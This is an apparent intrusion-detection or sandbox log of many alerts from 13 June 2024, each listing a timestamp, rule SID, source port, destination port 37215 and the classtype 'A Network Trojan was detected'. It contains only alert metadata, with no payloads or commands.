              Timestamp:06/13/24-21:33:07.058490
              SID:2829579
              Source Port:47244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452980
              SID:2835222
              Source Port:49208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177263
              SID:2829579
              Source Port:48280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.819878
              SID:2829579
              Source Port:43608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229800
              SID:2829579
              Source Port:40288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199473
              SID:2829579
              Source Port:51378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421138
              SID:2829579
              Source Port:38828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156163
              SID:2829579
              Source Port:43044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347501
              SID:2835222
              Source Port:34578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630202
              SID:2829579
              Source Port:39564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014481
              SID:2829579
              Source Port:40406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298441
              SID:2835222
              Source Port:41460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306868
              SID:2835222
              Source Port:50800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369523
              SID:2835222
              Source Port:37556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697202
              SID:2835222
              Source Port:42118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943855
              SID:2829579
              Source Port:45112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275288
              SID:2829579
              Source Port:57036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569952
              SID:2835222
              Source Port:43790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305015
              SID:2835222
              Source Port:60970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098205
              SID:2835222
              Source Port:40652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785430
              SID:2829579
              Source Port:38974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678958
              SID:2829579
              Source Port:37776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834983
              SID:2829579
              Source Port:58036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403213
              SID:2835222
              Source Port:40328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356729
              SID:2829579
              Source Port:35432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074072
              SID:2835222
              Source Port:35680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318797
              SID:2835222
              Source Port:35696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158249
              SID:2835222
              Source Port:51038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028299
              SID:2835222
              Source Port:57588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212752
              SID:2829579
              Source Port:52830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348831
              SID:2829579
              Source Port:56734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821023
              SID:2829579
              Source Port:34898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421822
              SID:2829579
              Source Port:58506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909085
              SID:2829579
              Source Port:45930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302763
              SID:2835222
              Source Port:33888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156072
              SID:2829579
              Source Port:40276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246388
              SID:2829579
              Source Port:41676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824923
              SID:2829579
              Source Port:58584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224908
              SID:2829579
              Source Port:47896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707615
              SID:2829579
              Source Port:47256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508581
              SID:2835222
              Source Port:43306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508436
              SID:2835222
              Source Port:57266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358781
              SID:2835222
              Source Port:35826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074676
              SID:2835222
              Source Port:49844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243806
              SID:2829579
              Source Port:49898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.791614
              SID:2835222
              Source Port:33794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127442
              SID:2829579
              Source Port:35098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629935
              SID:2835222
              Source Port:50426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415721
              SID:2829579
              Source Port:60456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488548
              SID:2835222
              Source Port:53230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971285
              SID:2835222
              Source Port:56310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731542
              SID:2829579
              Source Port:34848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885281
              SID:2829579
              Source Port:41086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525374
              SID:2835222
              Source Port:38200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633348
              SID:2835222
              Source Port:35446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357478
              SID:2829579
              Source Port:37172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256868
              SID:2835222
              Source Port:58514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.570311
              SID:2829579
              Source Port:46958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996743
              SID:2829579
              Source Port:54128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992238
              SID:2829579
              Source Port:34922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870073
              SID:2835222
              Source Port:33192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126440
              SID:2829579
              Source Port:59388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.029032
              SID:2835222
              Source Port:51086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509353
              SID:2835222
              Source Port:48928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527539
              SID:2829579
              Source Port:46268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091001
              SID:2829579
              Source Port:54862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974115
              SID:2829579
              Source Port:34078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.929860
              SID:2835222
              Source Port:51734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213598
              SID:2829579
              Source Port:48638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246287
              SID:2835222
              Source Port:56698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160134
              SID:2829579
              Source Port:59902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227610
              SID:2835222
              Source Port:51268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.196562
              SID:2835222
              Source Port:38734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164336
              SID:2835222
              Source Port:46342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173835
              SID:2829579
              Source Port:40630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551408
              SID:2835222
              Source Port:44908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214056
              SID:2829579
              Source Port:42468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.523917
              SID:2835222
              Source Port:56466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508558
              SID:2835222
              Source Port:43174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223433
              SID:2835222
              Source Port:34060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191584
              SID:2829579
              Source Port:50964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198778
              SID:2829579
              Source Port:38868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308388
              SID:2829579
              Source Port:39096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238447
              SID:2829579
              Source Port:53904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242141
              SID:2829579
              Source Port:40892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195887
              SID:2835222
              Source Port:34188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.042921
              SID:2829579
              Source Port:41776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940403
              SID:2835222
              Source Port:47102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568511
              SID:2829579
              Source Port:58942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.303933
              SID:2829579
              Source Port:42412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440601
              SID:2835222
              Source Port:54450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458032
              SID:2829579
              Source Port:60278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730021
              SID:2829579
              Source Port:50366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677771
              SID:2829579
              Source Port:40044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871960
              SID:2829579
              Source Port:46410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.080046
              SID:2835222
              Source Port:49164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528349
              SID:2835222
              Source Port:53514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028349
              SID:2835222
              Source Port:60976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098379
              SID:2835222
              Source Port:57642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322270
              SID:2835222
              Source Port:35774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632843
              SID:2835222
              Source Port:37728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991316
              SID:2835222
              Source Port:42716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347320
              SID:2829579
              Source Port:33694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173402
              SID:2829579
              Source Port:40326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403052
              SID:2829579
              Source Port:57092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111794
              SID:2829579
              Source Port:47408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758059
              SID:2829579
              Source Port:55490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153671
              SID:2829579
              Source Port:35016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350232
              SID:2829579
              Source Port:36680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.679053
              SID:2829579
              Source Port:60752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803501
              SID:2829579
              Source Port:37966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.460045
              SID:2829579
              Source Port:38642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108646
              SID:2829579
              Source Port:52676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.218194
              SID:2835222
              Source Port:55382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350335
              SID:2835222
              Source Port:47176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659362
              SID:2835222
              Source Port:35308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730718
              SID:2829579
              Source Port:41984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093372
              SID:2835222
              Source Port:36186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173865
              SID:2835222
              Source Port:40380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.251922
              SID:2835222
              Source Port:55706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377624
              SID:2829579
              Source Port:44036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308885
              SID:2835222
              Source Port:48322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241691
              SID:2835222
              Source Port:58632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262602
              SID:2829579
              Source Port:36178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155654
              SID:2829579
              Source Port:47606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350737
              SID:2835222
              Source Port:35834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320505
              SID:2835222
              Source Port:49082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177526
              SID:2829579
              Source Port:56848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.930728
              SID:2835222
              Source Port:49994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973640
              SID:2835222
              Source Port:41226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344557
              SID:2835222
              Source Port:48642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159516
              SID:2829579
              Source Port:52352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.944167
              SID:2829579
              Source Port:38574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695989
              SID:2829579
              Source Port:35732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439160
              SID:2829579
              Source Port:42768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.297525
              SID:2829579
              Source Port:56892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990518
              SID:2835222
              Source Port:34774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439668
              SID:2829579
              Source Port:51024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477709
              SID:2835222
              Source Port:37040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749930
              SID:2835222
              Source Port:40918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308572
              SID:2829579
              Source Port:55850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820774
              SID:2829579
              Source Port:48638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940981
              SID:2829579
              Source Port:54502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.672187
              SID:2835222
              Source Port:40740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565737
              SID:2829579
              Source Port:35564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728970
              SID:2829579
              Source Port:37734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294622
              SID:2829579
              Source Port:35392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152332
              SID:2835222
              Source Port:48400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309520
              SID:2829579
              Source Port:41680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867739
              SID:2835222
              Source Port:37744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611350
              SID:2829579
              Source Port:40336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275917
              SID:2835222
              Source Port:47278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480028
              SID:2835222
              Source Port:50840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306455
              SID:2835222
              Source Port:57358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611217
              SID:2835222
              Source Port:42170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273693
              SID:2835222
              Source Port:34248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222581
              SID:2835222
              Source Port:48704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275680
              SID:2835222
              Source Port:50652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659003
              SID:2835222
              Source Port:39500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.147906
              SID:2835222
              Source Port:39586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027013
              SID:2835222
              Source Port:48688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611209
              SID:2829579
              Source Port:42344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347643
              SID:2835222
              Source Port:50828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157940
              SID:2835222
              Source Port:36636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129512
              SID:2835222
              Source Port:59082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356560
              SID:2829579
              Source Port:39954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417775
              SID:2829579
              Source Port:52816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086821
              SID:2829579
              Source Port:60196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369620
              SID:2835222
              Source Port:42282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013906
              SID:2835222
              Source Port:34658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486638
              SID:2829579
              Source Port:51054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155954
              SID:2829579
              Source Port:39528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133909
              SID:2835222
              Source Port:33092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223062
              SID:2835222
              Source Port:36556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555752
              SID:2829579
              Source Port:53596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573448
              SID:2829579
              Source Port:51780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055908
              SID:2829579
              Source Port:42392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749466
              SID:2829579
              Source Port:58546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694886
              SID:2829579
              Source Port:40984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679712
              SID:2829579
              Source Port:43974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.489044
              SID:2829579
              Source Port:50008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547016
              SID:2835222
              Source Port:33466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886610
              SID:2829579
              Source Port:56154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974634
              SID:2829579
              Source Port:60044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301447
              SID:2835222
              Source Port:34310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708102
              SID:2835222
              Source Port:54746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790395
              SID:2829579
              Source Port:51300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.301155
              SID:2829579
              Source Port:54598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357976
              SID:2829579
              Source Port:55114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085629
              SID:2835222
              Source Port:58570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991821
              SID:2829579
              Source Port:51248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275591
              SID:2829579
              Source Port:33168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170353
              SID:2829579
              Source Port:50120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263396
              SID:2829579
              Source Port:52002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755802
              SID:2829579
              Source Port:58722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676900
              SID:2835222
              Source Port:57604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028773
              SID:2835222
              Source Port:58782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908139
